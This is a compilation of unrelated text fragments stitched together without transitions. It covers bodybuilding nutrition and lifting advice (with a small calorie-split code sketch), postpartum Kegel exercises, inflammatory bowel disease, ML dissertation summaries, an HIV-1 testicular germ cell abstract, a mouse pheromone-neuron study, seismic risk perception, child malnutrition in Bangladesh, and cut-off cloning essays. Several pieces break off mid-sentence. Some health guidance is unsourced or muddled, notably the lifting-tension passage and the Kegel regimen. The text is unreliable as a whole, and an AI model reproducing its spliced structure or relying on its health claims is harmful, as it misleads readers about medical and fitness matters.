A 2001 study at the University of Texas found that lifters who drank a shake containing amino acids and carbohydrates before working out increased their protein synthesis more than lifters who drank the same shake after exercising. The shake contained 6 grams of essential amino acids — the muscle-building blocks of protein — and 35 grams of carbohydrates.
Now, if you are somebody that is more of the "do-it-yourself" type, check out our self-paced online course, the Nerd Fitness Academy. The Academy has 20+ workouts for both bodyweight and weight training, a benchmark test to determine your starting workout, HD demonstrations of every movement, boss battles so you know when to level up your routine, meal plans, a questing system, and a supportive community.
Let's get one thing clear: It's all about the bum. Sure, built biceps fill out a shirt and six-pack abs are the prize of every beachgoer, but the back is where it's at. A bodacious booty is essential to a good physique—and not just for stage-bound fitness contestants. Everyone seems to want a great bum. Photos of posteriors flood the Internet and are often the most viewed—and "liked"—body part on social media. There's just something magical about a beautiful butt!
Increase your caloric consumption. Keep a log of the number of calories you eat, and use the average of those numbers to estimate your daily caloric needs. Then, multiply that number by 1.1. Make sure your calories are coming from a variety of healthy, minimally processed foods to provide quality nutrients for muscle-building. Try to get 30% of your calories from proteins, 50% from carbohydrates, and 20% from fats.[1]
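As a sketch, the calculation described above (average logged intake times 1.1, split 30/50/20 across protein, carbs and fat at 4/4/9 kcal per gram) could look like this; the sample calorie log is invented.

```python
# Hypothetical helper implementing the rule of thumb above:
# average logged intake x 1.1, split 30% protein / 50% carbs / 20% fat.
# Protein and carbs provide ~4 kcal/g, fat ~9 kcal/g.

def bulking_targets(logged_calories):
    """Return (daily kcal, grams protein, grams carbs, grams fat)."""
    daily = sum(logged_calories) / len(logged_calories) * 1.1
    protein_g = daily * 0.30 / 4
    carbs_g = daily * 0.50 / 4
    fat_g = daily * 0.20 / 9
    return round(daily), round(protein_g), round(carbs_g), round(fat_g)

print(bulking_targets([2400, 2600, 2500]))  # a few days of logged intake (invented)
```

The multiplier is only a starting point; as the text notes, adjust up or down based on what the scale actually does.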
How can the muscle progress just because you held a weight for a while when you could have held a heavier weight for less time? It won't. It won't grow because it's not receiving new tension. Extending the rep by going slower is great, yes, but this slowness must be the actual bar speed, not just slow because you can make it slow. You create actual bar speed by making light weight feel heavy. So lift light weight so that the fibers have to switch when it starts to feel heavy. This will increase your strength compared to just lifting heavier right away or all the time. This will help create an actual tempo with actual weights. Remember my example above about the overall weight after making light weights feel heavy? This is because your muscles have sensed a level of tension that altered their force production, so now you have to lift less, yet work harder. Read that again :) this is growth. This is how a muscle senses that it needs to grow. If you keep the same weight and never increase it, then you keep the same tension, and that same tension is not enough to create new tension. Remember when I talked about failure? Well, the point where the fatigue of failure comes into play alters as well. It takes less time. That's the point. Not much time is needed for growth; just break down the muscle as much as you can to a healthy level and do it again. Keep doing it and keep trying to increase the weight.
If you’re a beginner, you should train with three full-body workouts per week. In each one, do a compound pushing movement (like a bench press), a compound pulling movement (like a chinup), and a compound lower-body exercise (squat, trap-bar deadlift, for example). If you want to add in 1–2 other exercises like loaded carries or kettlebell swings as a finisher, that’s fine, but three exercises is enough to work the whole body.
Instruction
1
Pregnancy and childbirth put pressure on all the organs and tissues of the pelvic floor. The bladder, the intestine and the vagina lose their tone, so the couple's sex life often suffers a series of setbacks after the birth of a child: the man does not experience the old sensations, and the woman feels discomfort and pain. To return the muscles to their original shape, women who have given birth are advised to perform Kegel exercises. The complex was developed by the gynecologist Arnold Kegel in the mid-20th century and is still relevant today. The exercises are aimed at training the muscles of the perineum and pelvic floor. Initially, their goal was the prevention and treatment of urinary incontinence, prostatitis, hemorrhoids and other diseases associated with decreased muscle tone of the urinary tract and rectum. However, Kegel exercises also effectively tighten the vaginal muscles. Begin the complex no earlier than 2 weeks after the baby is born; however, if the woman had stitches, a caesarean section or other complications after birth, she should consult a doctor before exercising.
2
The most common and effective exercise is contraction of the pelvic floor muscles. The muscles surrounding the anus, together with the muscles of the perineum and vagina, form a figure eight and are connected. Thus, performing this exercise strengthens all the muscles of the pelvic floor, which is important for mothers who have noticed a lowered tone of the intestine and bladder. To understand how to perform the exercise correctly, try to stop the stream during urination; you will feel which muscles are involved. Squeeze the muscles gently and slowly. To start, it is sufficient to perform 20 contractions 1-2 times a day. At first this number of repetitions can be challenging, so start with 2-3 times, holding the contracted muscles for 5-10 seconds. After a while, when you notice that the exercise comes easily to you, increase the number of repetitions, and then the number of sets. In addition, try the contractions in different positions - sitting, lying, squatting.
3
When you can successfully do the recommended number of repetitions, try to increase the speed of muscle contraction and add a push, similar to the way you pushed during delivery. For the exercises to have an effect, it is recommended to add 5 reps to each of them every week. The complex should be performed up to 5 times a day; ideally, you should bring the daily number of contractions to 150. A definite plus of this routine is that it can be done in any position and in any situation: while walking, on public transport, in bed, etc.
Inflammatory bowel disease (IBD) is a term for two conditions,
Crohn's disease and ulcerative colitis, both of which involve chronic inflammation of the gastrointestinal (GI) tract. IBD is often mistaken for IBS (irritable bowel syndrome). Symptoms of inflammatory bowel disease include: persistent diarrhea, abdominal pain, rectal bleeding/bloody stools, weight loss and fatigue.
To diagnose IBD, endoscopy is used for Crohn's disease and colonoscopy for ulcerative colitis, along with imaging studies such as MRI and computed tomography (CT). Doctors will also
check stool samples for any possible infection or run blood tests to confirm their diagnosis.
Crohn's disease: can affect any part of the GI tract, from mouth to anus. Most often it affects the portion of the small intestine before the large intestine (colon). Damaged areas appear in patches next to areas of healthy tissue, and inflammation may reach through multiple layers of the walls of the GI tract.
Ulcerative colitis: occurs in the large intestine (colon) and the rectum. Damaged areas are continuous (not patchy), usually starting at the rectum and spreading further into the colon. Inflammation is present only in the innermost layer of the lining of the colon.
How is IBD treated? Different types of medications, including immunomodulators, corticosteroids and aminosalicylates, are used, and vaccinations are recommended to prevent infections. Severe IBD may require surgery to remove the damaged portion of the GI tract, although surgery is now uncommon thanks to advances in treatment. Crohn's disease and ulcerative colitis require different types of surgeries.
How to manage IBD?
The cause of IBD is still not fully understood and it cannot be prevented. However, IBD symptoms can be managed to prevent complications.
Stop smoking. Smoking worsens treatment outcomes and increases flare-ups among patients with Crohn's disease.
Get recommended vaccinations. IBD patients treated with certain medications have a higher risk of infection.
Ask your doctor if you should be screened for colorectal cancer. Patients with IBD may need to start screening for colorectal cancer before age 50.
If you are a woman with IBD, talk to your doctor about how to prevent cervical cancer. Patients with IBD are at higher risk of cervical cancer.
Ask your doctor if you need a bone density test. Certain medications used to treat IBD may increase your risk of osteoporosis.
Diet & Nutrition: diet and nutrition can help manage IBD symptoms, but food does not cause IBD.
Eat smaller meals at more frequent intervals. Eat five small meals a day, every three or four hours, rather than the traditional three large meals a day.
Reduce the amount of greasy or fried foods. High-fat foods may cause diarrhea and gas if fat absorption is incomplete.
Watch dairy intake. People who are lactose intolerant or who are experiencing IBD or IBS may need to limit the amount of milk or milk products they consume.
Restrict the intake of certain high-fiber foods. If there is narrowing of the bowel, these foods may cause cramping. High-fiber foods also cause contractions once they enter the large intestine and, because they are not completely digested by the small intestine, may cause diarrhea as well.
Avoid problem (trigger) foods. Eliminate any foods that make symptoms worse. These may include "gassy" foods (such as beans, cabbage and broccoli), spicy food, popcorn and alcohol, as well as foods and drinks that contain caffeine, such as chocolate and soda.
Foods to try: bananas, applesauce, canned varieties of fruit, white bread, crackers made with white flour, plain cereals, white rice, refined pastas, potatoes without the skin, cheese (if you're not lactose intolerant), smooth peanut butter, bland soft foods, cooked vegetables, canola and olive oils, and low-sugar sports drinks or Crystal Light diluted with water.
Foods to avoid: fresh fruit (unless blended or juiced); prunes, raisins or dried fruit; uncooked vegetables and raw foods; high-fiber foods (such as fiber-rich breads, cereals, nuts and leafy greens); high-sugar foods; skins, seeds and popcorn; high-fat foods; spicy foods; beans; some dairy products; large food portions; caffeine in coffee, tea and other beverages; and ice-cold liquids (even water).
Managing stress also helps reduce IBD symptoms. Getting enough sleep, nourishing the body and getting enough physical activity help prevent the prolongation and pain caused by IBD.
For more on inflammatory bowel disease, please visit:
www.cdc.gov http://www.crohnscolitisfoundation.org
Image courtesy: Google, http://theconversation.com
Author: HealthyLife | Posted on: May 18, 2018
As a data scientist, an integral part of my work in the field revolves around keeping current with research coming out of academia. I frequently scour arXiv.org for late-breaking papers that show trends and fertile areas of research. Other sources of valuable research developments are in the form of Ph.D. dissertations, the culmination of a doctoral candidate’s work to confer his/her degree. Ph.D. candidates are highly motivated to choose research topics that establish new and creative paths toward discovery in their field of study. In this article, I present 10 compelling machine learning dissertations that I found interesting in terms of my own areas of pursuit. I hope you’ll find several of them that match your own interests. Each thesis may take a while to consume but will result in hours of satisfying summer reading. Enjoy!
[Related Article: The Best Machine Learning Research of 2019 So Far]
Over the past several years, the use of wearable devices has increased dramatically, primarily for fitness monitoring, largely due to their greater sensor reliability, increased functionality, smaller size, increased ease of use, and greater affordability. These devices have helped many people of all ages live healthier lives and achieve their personal fitness goals, as they are able to see quantifiable and graphical results of their efforts every step of the way (i.e. in real-time). Yet, while these device systems work well within the fitness domain, they have yet to achieve a convincing level of functionality in the larger domain of healthcare.
The goal of the research detailed in this dissertation is to explore and develop accurate and quantifiable sensing and machine learning techniques for eventual real-time health monitoring by wearable device systems. To that end, a two-tier recognition system is presented that is designed to identify health activities in a naturalistic setting based on accelerometer data of common activities. In Tier I a traditional activity recognition approach is employed to classify short windows of data, while in Tier II these classified windows are grouped to identify instances of a specific activity.
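The two-tier idea can be illustrated with a toy sketch (my own illustration, not the dissertation's code): Tier I assigns a label to each short window of accelerometer data, and Tier II merges runs of identically labeled windows into activity instances, discarding runs too short to be a real instance. The labels and threshold are invented.

```python
# Toy sketch of a two-tier activity recognizer.
from itertools import groupby

def tier_one(windows, classify):
    """Tier I: classify each short window of sensor data."""
    return [classify(w) for w in windows]

def tier_two(labels, min_windows=3):
    """Tier II: group runs of identical labels into activity instances."""
    instances = []
    start = 0
    for label, run in groupby(labels):
        n = len(list(run))
        if n >= min_windows:  # ignore spurious one-off classifications
            instances.append((label, start, start + n))
        start += n
    return instances

labels = ["walk", "walk", "walk", "cough", "walk", "walk", "walk", "walk"]
print(tier_two(labels))  # the single "cough" window is filtered out
```

Grouping classified windows this way is what lets Tier II report discrete instances of an activity rather than a stream of per-window labels.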
This dissertation proposes efficient algorithms and provides theoretical analysis through the angle of spectral methods for some important non-convex optimization problems in machine learning. Specifically, the focus is on two types of non-convex optimization problems: learning the parameters of latent variable models and learning in deep neural networks. Learning latent variable models is traditionally framed as a non-convex optimization problem through Maximum Likelihood Estimation (MLE). For some specific models such as multi-view model, it’s possible to bypass the non-convexity by leveraging the special model structure and convert the problem into spectral decomposition through Methods of Moments (MM) estimator. In this research, a novel algorithm is proposed that can flexibly learn a multi-view model in a non-parametric fashion. To scale the nonparametric spectral methods to large datasets, an algorithm called doubly stochastic gradient descent is proposed which uses sampling to approximate two expectations in the problem, and it achieves better balance of computation and statistics by adaptively growing the model as more data arrive. Learning with neural networks is a difficult non-convex problem while simple gradient-based methods achieve great success in practice. This part of the research tries to understand the optimization landscape of learning one-hidden-layer networks with Rectified Linear (ReLU) activation functions. By directly analyzing the structure of the gradient, it can be shown that neural networks with diverse weights have no spurious local optima.
We increasingly depend on algorithms to mediate information and thanks to the advance of computation power and big data, they do so more autonomously than ever before. At the same time, courts have been deferential to First Amendment defenses made in light of new technology. Computer code, algorithmic outputs, and arguably, the dissemination of data have all been determined as constituting “speech” entitled to constitutional protection. However, continuing to use the First Amendment as a barrier to regulation may have extreme consequences as our information ecosystem evolves. This research focuses on developing a new approach to determining what should be considered “speech” if the First Amendment is to continue to protect the marketplace of ideas, individual autonomy, and democracy.
There is much interest in embedding data analytics into sensor-rich platforms such as wearables, biomedical devices, autonomous vehicles, robots, and Internet-of-Things to provide these with decision-making capabilities. Such platforms often need to implement machine learning (ML) algorithms under stringent energy constraints with battery-powered electronics. Especially, energy consumption in memory subsystems dominates such a system’s energy efficiency. In addition, the memory access latency is a major bottleneck for overall system throughput. To address these issues in memory-intensive inference applications, this dissertation proposes deep in-memory accelerator (DIMA), which deeply embeds computation into the memory array, employing two key principles: (1) accessing and processing multiple rows of memory array at a time, and (2) embedding pitch-matched low-swing analog processing at the periphery of bitcell array.
Large and sparse datasets, such as user ratings over a large collection of items, are common in the big data era. Many applications need to classify the users or items based on the high-dimensional and sparse data vectors, e.g., to predict the profitability of a product or the age group of a user. Linear classifiers are popular choices for classifying such data sets because of their efficiency. In order to classify large sparse data more effectively, the following important questions need to be answered: (a) Sparse data and convergence behavior: how do different properties of a data set, such as the sparsity rate and the mechanism of missing data, systematically affect the convergence behavior of classification? (b) Handling sparse data with non-linear models: how can non-linear data structures be learned efficiently when classifying large sparse data? This dissertation attempts to address these questions with empirical and theoretical analysis on large and sparse data sets.
As the size of Twitter data is increasing, so are undesirable behaviors of its users. One such undesirable behavior is cyberbullying, which could lead to catastrophic consequences. Hence, it is critical to efficiently detect cyberbullying behavior by analyzing tweets, in real-time if possible. Prevalent approaches to identifying cyberbullying are mainly stand-alone, and thus, are time-consuming. This dissertation proposes a new approach called distributed-collaborative approach for cyberbullying detection. It contains a network of detection nodes, each of which is independent and capable of classifying tweets it receives. These detection nodes collaborate with each other in case they need help in classifying a given tweet. The study empirically evaluates various collaborative patterns, and it assesses the performance of each pattern in detail. Results indicate an improvement in recall and precision of the detection mechanism over the stand-alone paradigm.
Extreme Learning Machine (ELM) is a training algorithm for the Single-Layer Feed-forward Neural Network (SLFN). What distinguishes ELM in theory from other training algorithms is the existence of an explicitly given solution, made possible by the immutability of the initialized weights. In practice, ELMs achieve performance similar to that of other state-of-the-art training techniques, while taking much less time to train a model. Experiments show that the speedup of training an ELM is up to 5 orders of magnitude compared to the standard error back-propagation algorithm. ELM is a recently discovered technique that has proved its efficiency in classic regression and classification tasks, including multi-class cases. In this dissertation, extensions of ELMs to problems that are atypical for Artificial Neural Networks (ANNs) are presented.
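The closed-form training that makes ELM fast can be sketched as follows (my own minimal illustration, assuming a sigmoid hidden layer and a least-squares output layer; the toy data and names are invented). Because the hidden weights are random and never updated, only the output weights need to be solved, in one pseudoinverse step.

```python
# Minimal ELM sketch: random fixed hidden layer, explicit output solution.
import numpy as np

def elm_fit(X, Y, n_hidden=50, seed=0):
    rng = np.random.default_rng(seed)
    W_in = rng.normal(size=(X.shape[1], n_hidden))  # fixed random weights
    b = rng.normal(size=n_hidden)
    H = 1.0 / (1.0 + np.exp(-(X @ W_in + b)))       # hidden activations
    W_out = np.linalg.pinv(H) @ Y                   # explicit least-squares solution
    return W_in, b, W_out

def elm_predict(X, W_in, b, W_out):
    H = 1.0 / (1.0 + np.exp(-(X @ W_in + b)))
    return H @ W_out

# Fit y = x1 + x2 on toy data; no iterative back-propagation involved.
X = np.random.default_rng(1).uniform(-1, 1, size=(200, 2))
y = X.sum(axis=1, keepdims=True)
model = elm_fit(X, y)
print(np.abs(elm_predict(X, *model) - y).max())  # small training error
```

The absence of an iterative loop is the whole point: training cost is dominated by one matrix decomposition, which is where the reported speedups come from.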
The subject of manifold learning is vast and still largely unexplored. As a subset of unsupervised learning, it faces a fundamental challenge in even adequately defining the problem, yet its solution serves an increasingly important desire to understand data sets intrinsically. The overarching goal of this work is to give researchers an understanding of the topic of manifold learning, with a description of and proposed method for performing manifold learning, guidance for selecting parameters when applying manifold learning to large scientific data sets, and open source software powerful enough to meet the demands of big data.
Artificial intelligence and machine learning power many technologies today, from spam filters to self-driving cars to medical decision assistants. While this revolution has hugely benefited from algorithmic developments, it also could not have occurred without data, which nowadays is frequently procured at massive scale from crowds. Because data is so crucial, a key next step towards truly autonomous agents is the design of better methods for intelligently managing now-ubiquitous crowd-powered data-gathering processes. This dissertation takes this key next step by developing algorithms for the online and dynamic control of these processes. The research considers how to gather data for its two primary purposes: training and evaluation.
[Related Article: 25 Excellent Machine Learning Open Datasets]
New computing systems have emerged in response to the increasing size and complexity of modern datasets. For best performance, machine learning methods must be designed to closely align with the underlying properties of these systems. This dissertation illustrates the impact of system-aware machine learning through the lens of optimization, a crucial component in formulating and solving most machine learning problems. Classically, the performance of an optimization method is measured in terms of accuracy (i.e., does it realize the correct machine learning model?) and convergence rate (after how many iterations?). In modern computing regimes, however, it becomes critical to additionally consider a number of systems-related aspects for best overall performance. These aspects can range from low-level details, such as data structures or machine specifications, to higher-level concepts, such as the tradeoff between communication and computation. We propose a general optimization framework for machine learning, CoCoA, that gives careful consideration to systems parameters, often incorporating them directly into the method and theory.
Poster presentation, open access. Published: HIV-1 interacts with human testicular germ cells in vitro. Retrovirology, volume 10, Article number P26 (2013).

Background
The recent reports of the endogenisation of SIV in primates demonstrate that lentiviruses can infect the germinal lineage. Testicular germ cells (TGC) of both infected men and macaques have been shown to harbor HIV-1/SIV nucleic acids and/or proteins
in situ by several teams including ours. Although HIV-1 binds but cannot enter isolated human spermatozoa, viral DNA has been detected in a few sperm cells from infected men, suggesting a clonal infection of their progenitors, the TGC. In this context, our investigation focused on the ability of human TGC to interact with HIV-1.

Materials and methods
TGC were isolated from normal human testes obtained at autopsy or following orchidectomy by enzymatic and mechanical dissociations. The purity of the preparation, as well as the expression of HIV receptors, was evaluated in flow cytometry. HIV-1 (R5 SF162 and primary strains, X4 IIIB and primary strains) binding on TGC untreated or treated with pronase (to remove proteins from the surface) was evaluated by p24 ELISA. The involvement of cellular HIV receptors and of the viral envelope protein Gp120 (env) in HIV-1 attachment was assessed.
Results
TGC preparations, composed of haploid spermatids, tetraploid spermatocytes and diploid spermatogonia and spermatocytes, were on average 94% pure and contained less than 4% of contaminating testicular somatic cells and 2% of CD45+ leukocytes.
As expected, TGC were devoid of CD4. However, they expressed at their membrane heparan sulfate proteoglycans, the mannose receptor and galactocerebroside, as well as CCR3.
Both HIV-1 R5 and X4 strains bound TGC in a dose-dependent manner, at either 4 °C or 37 °C. Protease treatment of the cells before and after HIV exposure drastically reduced viral binding. Heparan sulfate proteoglycans played a predominant role in HIV-1 attachment, as shown by the inhibitory effect of either a heparin competitor or heparinase treatment of the cells. The mannose receptor also contributed, to a lesser extent, to HIV-1 binding to TGC. Gp120-neutralizing antibodies reduced HIV-1 attachment to germ cells. Similarly, the binding of
env-depleted HIV-1 pseudovirus to germ cells was decreased when compared with env-positive pseudovirus.

Conclusions
Isolated human testicular germ cells express several alternative HIV receptors and support the attachment of HIV-1 R5 and X4 strains. Heparan sulfate proteoglycans and mannose receptor are mainly involved in the capture of HIV-1 by germ cells. HIV-1 binding to germ cells is partly mediated by the env protein. Whether testicular germ cells can support viral entry and further steps of the viral cycle (e.g. reverse transcription, integration) is under investigation.
Acknowledgements
This work was funded by INSERM, ANRS and Sidaction.
Additional information
Claire Deleage, Giulia Matusali contributed equally to this work.
Abstract
The vomeronasal organ (VNO) of mammals plays an essential role in the detection of pheromones. We obtained simultaneous recordings of action potentials from large subsets of VNO neurons. These cells responded to components of urine by increasing their firing rate. This chemosensory activation required phospholipase C function. Unlike most other sensory neurons, VNO neurons did not adapt under prolonged stimulus exposure. The full time course of the VNO spiking response is captured by a simple quantitative model of ligand binding. Many individual VNO neurons were strongly selective for either male or female mouse urine, with the effective concentrations differing as much as a thousandfold. These results establish a framework for understanding sensory coding in the vomeronasal system.
Pheromones of mammals induce complex behaviors and neuroendocrine changes, such as the choice of a mate, territorial defense, the female estrous cycle, and onset of puberty (1, 2). It has been argued that pheromones are detected primarily by the VNO (2, 3). The identification of a large number of putative pheromone receptor genes, grouped into two divergent gene families, suggests that the population of sensory neurons is highly heterogeneous (4–7). Individual glomeruli of the accessory olfactory bulb collect projections from multiple types of VNO receptor neurons, and therefore the sensory code is likely to involve patterns of activity across the receptor population (8,9). We reasoned that such a distributed population code should be observed by simultaneously recording the activity of a large number of VNO neurons in response to natural stimuli. This type of approach might reveal how sex, social dominance, or individual identity are represented by activity patterns in the VNO.
We recorded the action potentials of VNO neurons using a flat array of 61 extracellular electrodes (10). Even in the absence of stimulus, VNO neurons were spontaneously active (11), most of them firing intermittent bursts of spikes (Fig. 1A). When interpreting sensory responses, this pattern of maintained activity poses a hazard: A spontaneous burst may synchronize with the stimulus by chance and may be mistaken for a response. Such chance events may have confounded previous studies (12–14). We overcame this difficulty by delivering stimuli repeatedly, under precise temporal control (15). Of 221 neurons recorded in five preparations, 84 responded reproducibly to dilute urine by increasing their firing rate (see, for example, Fig. 1B). The sensitivity varied considerably across neurons, and the effective urine concentration (relative to undiluted urine) sufficient to elicit a response ranged from <0.0001 to 0.01. In no case did we observe a reproducible stimulus-induced inhibition (13,14).
In addition to pheromones, mouse urine contains urea and potassium ions, which could potentially cause neurons to fire by direct membrane depolarization. Three lines of evidence establish that, instead, a specific chemosensory pathway underlies these responses. First, “artificial urine,” containing the most abundant ionic and organic components of urine (10), did not affect firing, even at a relative concentration of 0.1 (16). Second, in any given VNO, some neurons were far more sensitive to female than to male mouse urine, whereas other neurons displayed an opposite selectivity (discussed further below). Third, responses to urine, but not to potassium ions, depend on a signal transduction cascade: 50 mM potassium excited the neurons, but the kinetics of the response differed sharply from that to urine (Fig. 2A). The onset of the urine response was delayed relative to the potassium response (by 0.33 ± 0.18 s, mean ± SD;
P < 10⁻⁷, if one assumes a Gaussian distribution), and it also lasted considerably longer (by 3.1 ± 2.5 s, measuring the difference in exponential decay times; P < 10⁻⁵). Presumably, potassium ions act directly to depolarize the membrane, whereas dilute urine achieves this only through a slower sensory transduction mechanism. A similar response delay occurs when odorants are presented to dissociated neurons of the main olfactory epithelium (17).
To obtain direct evidence for a signal transduction cascade, we applied pharmacological agents to the neuroepithelium. An inhibitor of phospholipase C, 10 μM U-73122 (18, 19), blocked spiking responses to urine but not to potassium (Fig. 2B). A nearly inactive structural analog, U-73343 (18), had no measurable effect on the response to urine. An inhibitor of phosphodiesterase, 500 μM isobutyl methylxanthine (IBMX), also had no effect on firing activity (44 cells). These results indicate that the response of VNO neurons to urine components involves the specific activation of an intracellular signal transduction pathway. Moreover, they identify phospholipase C–β (PLC-β) as a key element of the cascade and also confirm that cyclic nucleotides are not essential (20, 21). Molecular similarity has been found between the signaling pathways of mammalian VNO neurons and
Drosophila photoreceptors, including specific expression of ion channels of the TRP family (22). Requirement for PLC-β function in the VNO parallels the involvement of the NorpA protein in the Drosophila eye (23) and provides additional support for similarity between the two pathways.
Having established the specificity of these VNO responses, we proceeded to a quantitative analysis of sensory coding. In most sensory systems (24, 25), a sustained stimulus causes the primary receptor cells to adapt by altering their sensitivity. For example, olfactory receptor cells change their dose-response relation within seconds (26). In contrast, we found little or no adaptation in VNO neurons during a 100-s presentation of 300-fold diluted urine (Fig. 3). Previous work showed that mouse VNO neurons fire at a steady rate when driven with intracellular current injection (21). Our results demonstrate that the entire chemo-transduction process fails to adapt. The primary purpose of adaptation in other sensory systems is to retain sensitivity to variations in stimulus intensity over a wide range of background intensities. Such a facility may not be biologically relevant for pheromone detection. Given the relatively slow access of stimuli to the VNO (27), the need to detect minute amounts of pheromones, and the long-lasting impact of pheromone detection on the organism, adaptation might indeed be undesirable.
These observations led us to formulate a model in which the firing rate directly represents the occupancy of a pheromone receptor, as determined by first-order binding kinetics. We suppose that each neuron has just one receptor type and that each receptor molecule exists in one of two states, either unoccupied or bound to its ligand. At ligand concentration C, transitions to the bound state occur at rate k₊ = κC; reversion to the unbound state occurs at a rate k₋ independent of ligand concentration. The firing rate r, averaged across trials, increases with the fraction p of occupied receptors as r = r₀ + αp, where r₀ is the spontaneous firing rate and the proportionality factor α is the firing-rate increase at receptor saturation. From these kinetics, one readily derives the time dependence of the average firing rate following square pulses of ligand application [Eqs. 1 to 3 in (28)]. This model provides a pleasing fit to the kinetics of the response (Fig. 4, A and B). The steady-state firing rate during a prolonged step should follow the Michaelis-Menten law (Eq. 4), which is confirmed by the measurements (Fig. 4, C and D). Thus, one can characterize a neuron's sensitivity to a given stimulus with a single number: the Michaelis constant Kₘ = k₋/κ, which corresponds to the concentration that elicits a half-saturating response (29).
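A minimal numerical sketch may make this two-state binding model concrete. The rate constants and firing parameters below are illustrative placeholders, not the measured values:

```python
import math

def occupancy(t, C, kappa, k_minus, p0=0.0):
    """Fraction p of bound receptors at time t during a step of ligand
    concentration C, from first-order kinetics dp/dt = kappa*C*(1 - p) - k_minus*p."""
    k_plus = kappa * C
    p_ss = k_plus / (k_plus + k_minus)   # steady-state occupancy
    tau = 1.0 / (k_plus + k_minus)       # relaxation time constant
    return p_ss + (p0 - p_ss) * math.exp(-t / tau)

def firing_rate(p, r0=1.0, alpha=20.0):
    """Trial-averaged firing rate r = r0 + alpha*p (spikes/s)."""
    return r0 + alpha * p

# At steady state the occupancy follows the Michaelis-Menten law
# p = C / (C + Km) with Km = k_minus / kappa, so C = Km gives p = 1/2.
kappa, k_minus = 1.0, 0.01               # illustrative units
Km = k_minus / kappa
p_half = occupancy(t=1e6, C=Km, kappa=kappa, k_minus=k_minus)  # approaches 0.5
```

Note that raising C both raises the plateau and shortens the relaxation time, which is the qualitative signature of first-order binding.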
An individual neuron, faced with a urine sample of unknown concentration, cannot resolve the sex of the donor animal. On the other hand, a population of cells, with different chemical selectivities, can represent sex and concentration unambiguously. Thus, we measured the Michaelis constants of a population of neurons from a male mouse VNO (Fig. 4E). The sensitivities to both male and female mouse urine were distributed over 2 to 3 orders of magnitude. Nearly half of the neurons showed a clear preference for the sample from one or the other sex. This indicates that their specific ligands are present at different concentrations in male and female mouse urine, at ratios ranging up to 1000-fold. A similar result was obtained in a female mouse VNO (Fig. 4F).
To demonstrate that this observed selectivity is tied to the sex of the donor animal rather than to other characteristics, we tested the same VNO population with two urine samples from different animals of the same sex. The vast majority of neurons had similar Michaelis constants for the two samples: In Fig. 4, G and H, most points lie close to the diagonal (30), whereas they scatter far from the diagonal in Fig. 4, E and F. We conclude that the population response of VNO neurons is very sensitive to the sex of the donor. In addition, though, some cells (Fig. 4H) show a clear preference for one of the two male mouse samples, suggesting that these neurons recognize pheromones that vary between individuals of the same sex. Such receptor neurons may contribute to the behavioral recognition of individual differences (1, 2).
The VNOs of both sexes were found to contain neurons specific for the pheromones of either sex. This result is consistent with the fact that all putative pheromone receptors examined so far are expressed in both males and females (4, 5). In addition, more than half of VNO neurons responding to urine stimuli detect cues that are independent of sex. The absence of any clustering of neuronal response types in Fig. 4, E to H, reinforces the notion of a large heterogeneity among VNO sensory neurons, consistent with the existence of over 100 different putative receptor genes (4–7). Pheromone-induced behaviors and endocrine changes clearly involve complex sensory recognition that goes beyond mere sex discrimination, requiring identification of the species, familial status, and even individual identity of animals. The population recording approach described here should help in unraveling the neural code for these variables.
Abstract
This work is a synthesis of research into seismic risk perception in the Pollino area (southern Italy). Over the last 3 years, there has been an ongoing earthquake swarm affecting this area that straddles the border between the regions of Calabria and Basilicata. The perception of seismic risk is an important element in environmental planning. If land is considered in terms of reciprocal interaction between humans and their physical space, Geoethics can find a synthesis between humanistic and scientific knowledge with regard to the theme of disasters. Geoethics can especially help in terms of educating the population of an area about integrated risk management. It is believed that improved communications, awareness of risk complexity and levels of preparation would increase a community's resilience and allow for more effective planning. With this premise, a questionnaire was given to students in primary and secondary education, and to a sample of adults in some of the villages affected by the Pollino earthquake swarm. A comparison with people's mental representation of risk regarding great earthquakes of the past, such as those of Calabria in 1783, helps us to clarify the relationship between an extreme event and a disaster.
© 2015 The Author(s). Published by The Geological Society of London. All rights reserved.
Trends, Patterns and Issues of Child Malnutrition in Bangladesh

Abstract
Good nutrition is a prerequisite for national development and for the wellbeing of individuals. Although problems related to poor nutrition affect the entire population, children and women are especially vulnerable because of their unique physiology and socioeconomic characteristics. Bangladesh is among the countries with the highest prevalence of malnutrition in the world. According to UNICEF, malnutrition rates declined markedly in Bangladesh throughout the 1990s but remained high at the turn of the decade. A number of studies have been carried out by national and international organizations to evaluate the nutritional situation of Bangladesh. According to the latest national study, 41 percent of children under age 5 are stunted, 16 percent are wasted and 36 percent are underweight. The prevalence of anemia among infants, adolescent girls and pregnant women is still at unacceptable levels. The present study is an attempt to determine the trends and patterns of malnutrition among children in Bangladesh. The study also focuses on potential issues of child malnutrition in Bangladesh. This study involved an analysis of secondary data and information collected from different sources. The analysis shows a clear picture of the current trend and pattern of malnutrition in Bangladesh. Malnutrition and ill health are traceable partly to economic causes, food availability and educational factors. Ignorance is perhaps the biggest hurdle facing the silent majority in Bangladesh. Women's education, knowledge about sound feeding practices and eating habits, growth monitoring and women-supportive socio-cultural norms need to be given more emphasis to overcome the present situation.

Key words: Child malnutrition, Health, Bangladesh, Child care, Food availability, Poverty, Education, Natural disaster.
Artificial Cloning

Cloning refers to a number of different processes that can be used to produce genetically identical copies of a biological entity; in short, a clone is an identical duplicate of something living. Cloning also occurs naturally: single-celled organisms reproduce asexually, making a new individual from themselves without a partner. So if cloning is already done by these single-celled organisms, why is artificial cloning portrayed so badly in movies and media? Most
Cloning: Is It Ethical? Science today is developing at warp speed. We have the capability to do many things, including the cloning of actual humans! First you may ask: what is a clone? A clone is a group of cells or organisms that are genetically identical, all produced from the same original cell. There are three main types of cloning: two aim to produce live cloned offspring, and one aims simply to produce stem cells and then human organs. These three are:
The Ethical and Theological Implications of Human Cloning Introduction Advances in science and technology have often caused revolutionary changes in the way society views the world. When computers were first invented, they were used to calculate ballistics tables; today they perform a myriad of functions unimagined at their conception. Space travel changed the way mankind viewed itself in terms of a larger context, the universe. In 1978, the first test tube baby was born in England making
Cloning is one of the most controversial topics in all of science in the current day. Technology has come miles from where it has been, and we still have yet to perfect how it is used. When I chose this topic as one of the two I had to pick from the list, I didn’t really know how cloning worked or how I actually felt about the on-going conversation of whether or not cloning is ethical or moral, much less legal. What I have come to conclude after the various articles I have read, and the different
Cloning and Its Sociobiological Implications Picture this: walking down a street and seeing someone who looks exactly like you. They do the same things as you, act the same way you do, and are exactly alike in several ways. But have people ever considered the consequences of human cloning if it becomes permitted? Human cloning might seem like something out of a science-fiction novel, but it may someday be possible with advances in science and technology. This will result in the creation of several
